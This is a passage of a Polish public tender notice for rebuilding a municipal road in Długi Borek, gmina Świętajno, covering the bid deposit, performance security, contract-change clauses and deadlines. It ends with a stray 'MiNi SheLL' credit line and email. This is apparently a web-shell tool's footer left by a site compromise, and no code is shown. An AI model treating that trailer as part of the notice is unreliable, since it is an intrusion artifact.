należy wnieść przelewem na konto w Banku BS<br/>SZCZYTNO O/ŚWIĘTAJNO nr rachunku 87 8838 1028 2005 0200 0198 0035, z dopiskiem na przelewie:<br/>Wadium w postępowaniu Te.271.2.7.2025 pn. „Przebudowa drogi gminnej od km 0+000 do km 1+192<br/>w miejscowości Długi Borek, gmina Świętajno <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Od Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, wymagane będzie<br/>wniesienie, przed zawarciem umowy, zabezpieczenia należytego wykonania umowy w wysokości 5%<br/>ceny całkowitej (brutto) podanej w ofercie za wykonanie całości przedmiotu zamówienia.<br/>Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy.<br/>2) Zabezpieczenie należytego wykonania umowy może być wnoszone według wyboru<br/>wykonawcy w jednej lub w kilku formach wskazanych w art. 450 ust. 1 ustawy Pzp tj.:<br/>- pieniądzu;<br/>-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym,<br/>że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;<br/>- gwarancjach bankowych;<br/>- gwarancjach ubezpieczeniowych;<br/>- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9 listopada<br/>2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3) Zamawiający nie wyraża zgody na wniesienie zabezpieczenia w formach wskazanych w art. 450 ust. 2<br/>ustawy Pzp.<br/>4) Zamawiający nie wyraża zgody na tworzenie zabezpieczenia przez potrącenia z należności<br/>za częściowo wykonane świadczenia.<br/>5) Do zmiany formy zabezpieczenia w trakcie realizacji umowy stosuje się art. 451 ustawy Pzp.<br/>6) Zamawiający zwróci zabezpieczenie w następujących terminach:<br/>- 70% wysokości zabezpieczenia w terminie 30 dni od dnia podpisania protokołu odbioru końcowego<br/>przedmiotu zamówienia, tj. od dnia wykonania zamówienia i uznania przez zamawiającego za należycie<br/>wykonane;<br/>- 30% wysokości zabezpieczenia w terminie 15 dni od dnia, w którym upływa okres gwarancji/rękojmi<br/>(wskazać dłuższy), liczony zgodnie z postanowieniami zawartej umowy.<br/>7) Zabezpieczenie wnoszone w pieniądzu powinno zostać wpłacone przelewem na rachunek bankowy<br/>zamawiającego w Banku Spółdzielczym w Szczytnie O/Świętajno nr 87 8838 1028 2005 0200 0198 0035,<br/>tytuł przelewu Zabezpieczenie należytego wykonania umowy pn.: „Przebudowa drogi gminnej od km<br/>0+000 do km 1+192 w miejscowości Długi Borek, gmina Świętajno <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Strony przewidują możliwość dokonywania zmian w niniejszej umowie w następujących przypadkach:<br/>a) zaistnienia, po zawarciu niniejszej umowy, przypadku siły wyższej, przez którą, <br/>na potrzeby niniejszego warunku, należy rozumieć zdarzenie zewnętrzne o charakterze niezależnym od Stron, którego Strony nie mogły przewidzieć przed zawarciem niniejszej umowy, oraz którego Strony nie mogły uniknąć, ani któremu nie mogły zapobiec przy zachowaniu należytej staranności, w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia - w zakresie terminu wykonania umowy; <br/>b) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy lub świadczenia Stron - w zakresie wynikającym z tych zmian;<br/>c) powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w niniejszej umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie niniejszej umowy w celu jednoznacznej interpretacji jej postanowień przez Strony;<br/>d) dopuszczalnej prawem zmiany Stron umowy lub oznaczenia Stron umowy,<br/>e) zaistnienia konieczności wykonania robót dodatkowych czy innych czynności nieprzewidzianych przed zawarciem umowy, niezależnych od Wykonawcy - w zakresie zmiany terminu wykonania przedmiotu umowy.<br/>f) wystąpienia przeszkód w postaci niesprzyjających warunków atmosferycznych, które z punktu widzenia technologii wykonania przedmiotu umowy uniemożliwiają prawidłowe wykonanie przedmiotu umowy – w zakresie terminu wykonania umowy.<br/>g) innych przypadkach przewidzianych przepisami prawa.<br/>2.	Zmiany, o których mowa w ust. 1, dokonywane będą w formie aneksu do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/swietajno_ug</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-24 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com